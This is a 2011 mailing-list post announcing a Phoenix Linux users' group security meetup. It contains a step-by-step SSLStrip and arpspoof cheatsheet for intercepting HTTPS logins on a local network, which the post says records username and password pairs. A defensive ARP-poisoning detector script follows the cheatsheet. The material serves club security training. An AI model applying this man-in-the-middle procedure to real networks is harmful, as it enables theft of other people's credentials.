HackFest Tomorrow @ Noon 260 Arizona Avenue Chandler Gangplankhq.com

Lisa Kachold lisakachold at obnosis.com
Fri Feb 11 19:48:03 MST 2011


Next PLUG Security Team Saturday Noon - 15:00 Gangplankhq.com
http://plug.phoenix.az.us

David Huerta will be showcasing hayst.ac, his Firefox security plugin, which
is but one of the many Haystack Projects <http://haystackproject.org/>:

http://en.wikipedia.org/wiki/Haystack_%28MIT_project%29#External_links

After arriving in Arizona from the posh, cosmopolitan enclave of
southeastern Idaho, David founded the DeVry Linux User Group (DeLUG) in
2003, originally a student organization that drew members and activities
from the greater West Valley free software community, including students at
GCC and ASU West. He is also the founder of Hayst.ac, a web history
obfuscation system, and serves on the board of directors for HeatSync Labs,
a hackerspace in Chandler.

> PLUG-TREK "Our 12 year mission... to Identify, architect and traverse OSI
> layer 0-8 security <http://linuxgazette.net/166/kachold.html>; use modern
> professional test methodology tools from forensics to pentesting. Transcend
> systems administration to reverse engineering, forensic fuzzing, earnest
> exploits and claim a bugtraq accolade or two... Da da, da, da, da, da
> dum...muzak..."

Behind the scenes:

    * Cisco WPA2-Enterprise network setup.
    * Planning for Hamachi/LogMeIn HackFests.
    * Rebuild the old Linux system (with RADIUS for enterprise WPA2) into gPXE
      for imaging (just like we did for Installfest):
      http://www.ardyans.co.cc/ltsp-with-ubuntu-10-04.htm
      http://www.ardyans.co.cc/how-to-make-a-gpxe-for-booting-client.htm
    * Add a puppet/cfengine process to maintain our configuration files even
      after they are edited.


Just Like Ferengi - We Like to BE PREPARED:

# SSLStrip CHEATSHEET

OVERVIEW:

Requirements

    * Python >= 2.4 (apt-get install python)
    * The python "twisted-web" module (apt-get install twisted-web)

Setup

    * tar zxvf sslstrip-0.5.tar.gz
    * cd sslstrip-0.5
    * (optional) sudo python ./setup.py install

Running sslstrip

    * Flip your machine into forwarding mode:
      echo "1" > /proc/sys/net/ipv4/ip_forward
    * Set up iptables to redirect HTTP traffic to sslstrip:
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
    * Run sslstrip:
      sslstrip.py -l <listenPort>
    * Run arpspoof to convince a network they should send their traffic to you:
      arpspoof -i <interface> -t <targetIP> <gatewayIP>

Thanks to Moxie MarlinSpike

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-speakers.html#Marlinspike

STEP X STEP (for those who need it slower):

# Proxy Preparation

    * First verify routing and NAT:

    # cat /proc/sys/net/ipv4/ip_forward
    0

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    # cat /proc/sys/net/ipv4/ip_forward
    1

    # /sbin/iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

# Start MITM

    * Arpspoof addresses to the default interface gateway (and target machine):

    # arpspoof -i eth0 -t 192.168.1.231 192.168.1.244

# SSL Strip

    * Start SSLStrip:

    # ./sslstrip -l 8080

    * Open a browser and log in to an SSL site, https://Gmail.com for instance.

    # tail -f sslstrip.log

sslstrip.log will record the name:password pairs for each site visited through the proxy.

As you can see, the default gateway and target machine can be seasoned to
taste.

./sslstrip -h

------------------------------------end CHEATSHEET
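The cheatsheet above only works because the arpspoof step rebinds the gateway's IP to another MAC, so a sensor that records every ARP reply can spot the poisoning. The detector below is an added example written for this post, not part of the cheatsheet or of sslstrip; the log lines are constructed in tcpdump -n style (not a real capture) and reuse the 192.168.1.231 / 192.168.1.244 addresses from the walk-through.

```python
"""Flag ARP-cache poisoning of the kind arpspoof performs.

A host or IDS that logs ARP replies can alert when an IP address suddenly
claims a different MAC, and when one MAC answers for several IPs (the
poisoning box answers for both the gateway and the victim).
"""
import re
from collections import defaultdict

# Constructed sample lines in tcpdump -n style; .244 plays the gateway,
# .231 the victim, de:ad:be:ef:00:01 the machine running arpspoof.
SAMPLE_ARP_LOG = """\
12:00:01.000000 ARP, Reply 192.168.1.244 is-at 00:11:22:33:44:55, length 28
12:00:02.000000 ARP, Reply 192.168.1.231 is-at 00:aa:bb:cc:dd:ee, length 28
12:00:03.000000 ARP, Reply 192.168.1.244 is-at de:ad:be:ef:00:01, length 28
12:00:04.000000 ARP, Reply 192.168.1.231 is-at de:ad:be:ef:00:01, length 28
12:00:05.000000 ARP, Reply 192.168.1.244 is-at de:ad:be:ef:00:01, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)


def parse_arp_replies(log_text):
    """Yield (timestamp, ip, mac) for every ARP reply line; skip the rest."""
    for line in log_text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


def find_mac_changes(log_text):
    """Return (alerts, shared): alerts for IPs whose MAC binding changed,
    and MACs that claimed more than one IP."""
    bound = {}                      # ip -> MAC currently bound to it
    ips_by_mac = defaultdict(set)   # mac -> every IP it has answered for
    alerts = []
    for ts, ip, mac in parse_arp_replies(log_text):
        ips_by_mac[mac].add(ip)
        old = bound.get(ip)
        if old is not None and old != mac:
            alerts.append({"time": ts, "ip": ip, "old_mac": old, "new_mac": mac})
        bound[ip] = mac
    shared = {m: sorted(ips) for m, ips in ips_by_mac.items() if len(ips) > 1}
    return alerts, shared


if __name__ == "__main__":
    found, multi = find_mac_changes(SAMPLE_ARP_LOG)
    for a in found:
        print("ALERT {time}: {ip} moved from {old_mac} to {new_mac}".format(**a))
    for mac, ips in multi.items():
        print("ALERT: %s answers for %s" % (mac, ", ".join(ips)))
```

The same logic applies to a live feed such as `tcpdump -n -l arp` piped into the parser, or to a periodic diff of the host's own ARP table against a known-good gateway MAC.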

 http://www.obnosis.com

Catch My MetaSploit & IP CAM Surveillance
Presentations @ ABLEConf.com in April!

